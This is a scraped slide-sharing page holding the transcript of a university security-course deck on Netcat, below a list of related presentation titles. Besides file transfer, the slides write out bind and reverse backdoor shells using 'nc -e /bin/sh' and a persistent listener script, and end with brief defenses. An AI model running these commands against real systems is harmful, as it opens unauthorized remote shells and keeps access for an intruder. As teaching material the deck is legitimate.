CIT 380: Securing Computer SystemsSlide #1 CIT 380: Securing Computer Systems Netcat.

Slides:



Advertisements
Similar presentations
SSH SSH is “Secure SHell” Secure, compressed, widely supported, fast Allows both users to get jobs done, and also allows system administrators to sleep.
Advertisements

Backdoors, Trojans and Rootkits CIS 413 This presentation is an amalgam of presentations by Mark Michael, Randy Marchany and Ed Skoudis. I have edited.
Backdoors A backdoor is a program that allows attackers to bypass normal security controls on a system, gaining access on the attacker’s own terms.
מנחה : ד " ר יצחק אביב מגיש : אורי ווידר ת. ז :
Presented by: Melissa Dark CERIAS, Purdue University.
Cybersecurity Training in a Virtual Environment By Chinedum Irrechukwu.
Hands-On Ethical Hacking and Network Defense Second Edition Chapter 5 Port Scanning.
Hands-On Ethical Hacking and Network Defense Chapter 5 Port Scanning.
CIT 380: Securing Computer SystemsSlide #1 CIT 380: Securing Computer Systems Scanning.
Hands-On Ethical Hacking and Network Defense Chapter 5 Port Scanning Last updated
Scanning Determining if the system is alive IP Scanning Port Scanning War Dialing.
Suneeta Chawla Web Security Presentation Topic : IP Spoofing Date : 03/24/04.
Week 6-1 Week 6: Trojans and Backdoors What is a Trojan Horse? Overt and Covert.
Offensive Security Part 1 Basics of Penetration Testing
Nada Abdulla Ahmed.  SmoothWall Express is an open source firewall distribution based on the GNU/Linux operating system. Designed for ease of use, SmoothWall.
ITP 457 Network Security Network Hacking 101. Hacking Methodology (review) 1. Gather target information 2. Identify services and ports open on the target.
Virtual Machine and UNIX. What is a VM? VM stands for Virtual Machine. It is a software emulation of hardware. By using a VM, you can have the same hardware.
Amazon EC2 Quick Start adapted from EC2_GetStarted.html.
MIS Week 7 Site:
Ssh: secure shell. overview Purpose Protocol specifics Configuration Security considerations Other uses.
Firewalls CS158B Don Tran. What is a Firewall? A firewall can be a program or a device that controls access to a network.
Dennis  Application Security Specialist  WhiteHat Security  Full-Time Student  University of Houston – Main Campus ▪ Computer.
1 Backdoors and Trojans. ECE Internetwork Security 2 Agenda Overview Netcat Trojans/Backdoors.
Introduction to UNIX/Linux Exercises Dan Stanzione.
A Practical Guide to Fedora and Red Hat Enterprise Linux Unit 7: Linux Network Services Chapter 10: Networking and the Internet By Fred R. McClurg Linux.
Computer Security An overview of terms and key concepts.
Port Forwarding NeCrOs © 2008 Linksys® Routers Edition 1.What is Port Forwarding? 2.How to Port Forward? 3.How to Port Trigger? (Alternative Way) 4.How.
CS391 Computer & Network Security
ECE4112 Lab 7: Honeypots and Network Monitoring and Forensics Group 13 + Group 14 Allen Brewer Jiayue (Simon) Chen Daniel Chu Chinmay Patel.
| nectar.org.au NECTAR TRAINING Module 5 The Research Cloud Lifecycle.
CIT 380: Securing Computer SystemsSlide #1 CIT 380: Securing Computer Systems Malware.
Introduction to Barracuda IM Firewall. Two Security Products in One Public IM Management –Manages traffic from public IM clients, including AIM, Yahoo!
Remote Control & Backdoor Once administrative access has been gained hackers will maintain access through the backdoor remotely.
1 Figure 4-1: Targeted System Penetration (Break-In Attacks) Host Scanning  Ping often is blocked by firewalls  Send TCP SYN/ACK to generate RST segments.
Chapter 8 Phase3: Gaining Access Using Network Attacks
Mark Shtern.  Secure your infrastructure using IDS, application firewalls, or honeypots  Plant your flag on opponent’s machine  Prevent intruders from.
CIT 380: Securing Computer SystemsSlide #1 CIT 380: Securing Computer Systems Backdoors and Rootkits.
Viruses According to Microsoft.com, viruses are “small software programs...that interfere with computer operation” Harm data, spread to others through.
How to implement GPOs and secure a MS Windows Environment with little to NO user awareness!?!?
Rootkits, Backdoors, and Trojans ECE 4112 – Lab 5 Summary – Spring 2006 Group 9 Greg Sheridan Terry Harvey Group 10 Matthew Bowman Laura Silaghi Michael.
| nectar.org.au NECTAR TRAINING Module 5 The Research Cloud Lifecycle.
Hands-On Ethical Hacking and Network Defense
AQA A2 COMP 3: Internet Security. Lesson Aim By the end of the lesson: By the end of the lesson: Describe different security issues and recommend tools/techniques.
Getting Connected CPSC 1010 August 21, Connecting to the SOC Servers Why would we need to connect Work with files Transfer files from your local.
Install CB 1.8 on Ubuntu. Steps Followed Install Ubuntu (Ubuntu LTS) on Virtual machine – (VMware Workstation) (
CIT 380: Securing Computer SystemsSlide #1 CIT 380: Securing Computer Systems Covert Channels.
Mac OS X backdoor Trojan, now in beta? 報告人:劉旭哲. Introduction It targets users of Mac OS X As even the malware itself admits, it is not yet finished. It.
SSH. 2 SSH – Secure Shell SSH is a cryptographic protocol – Implemented in software originally for remote login applications – One most popular software.
Installing git In Linux: sudo apt-get install git In Windows: download it from run the setuphttp://git-scm.com/download/win.
FIREWALLS An Important Component in Computer Systems Security By: Bao Ming Soh.
Backdoors and Trojans.
Introduction to Barracuda IM Firewall
Ssh: secure shell.
PART 1 – FILE UPLOAD BACKDOORS: METASPLOIT
CITA 352 Chapter 5 Port Scanning.
Module 28 (netcat and pivoting)
Backdoor Attacks.
Metasploit a one-stop hack shop
Intro to Ethical Hacking
Metasploit Project For this exploit I will be using the following strategy Create backdoor exe file Upload file to website Have victim computer download.
Get QBDBMGRN not running on this computer QBDBMgrN not runningQBDBMgrN not running: Configure your firewall to open Dynamic database port for the QuickBooks.
RECONNAISSANCE & ENUMERATION
Chapter 3. Basic Dynamic Analysis
Intro to Ethical Hacking
Web Application Penetration Testing ‘17
My 7-Point Plan for Windows Security
Penetration Testing & Network Defense
Penetration Testing & Network Defense
SHELLSHOCK ATTACK.
Presentation transcript:

CIT 380: Securing Computer SystemsSlide #1 CIT 380: Securing Computer Systems Netcat

Downloading Netcat Netcat for Linux – Netcat for Windows – CIT 380: Securing Computer SystemsSlide #2

Netcat for File Transfer Copy files from machine foo to bar on port 3333 (-l, listen): Source Machine offering a file for transfer: nc -l -p 3333 > backup.iso Destination Machine, pulling the file: nc bar 3333 < backup.iso CIT 380: Securing Computer SystemsSlide #3

Backdoor Command Shell Victim –$nc –l –p 3333 –e /bin/sh Attacker –$nc victim 3333 –Type commands Port could be blocked by firewall CIT 380: Securing Computer SystemsSlide #4

Push Backdoor Command Shell Attacker Machine: $nc –l –p 3333 Victim’s Machine: $nc attacker-machine 3333 –e /bin/sh Attacker types command on shell running on victim CIT 380: Securing Computer SystemsSlide #5

Persistent Listener Victim’s machine listener.sh while [1]; do echo “Started”; nc –l –p 3333 –e /bin/sh; done chmod 555 listener.sh nohup./listener.sh & CIT 380: Securing Computer SystemsSlide #6

Relaying Traffic ncrelay.bat (Windows) C:\nc.exe [nexthop] C:\>nc –l –p –e ncrelay.bat CIT 380: Securing Computer SystemsSlide #7

Netcat Defenses Use firewall to prevent netcat transfers Minimum number of listening ports Know what process should be running on your system. CIT 380: Securing Computer SystemsSlide #8

Feedback: Privacy Policy Feedback
Do Not Sell My Personal Information
About project: SlidePlayer Terms of Service

© 2025 SlidePlayer.com. Inc. All rights reserved.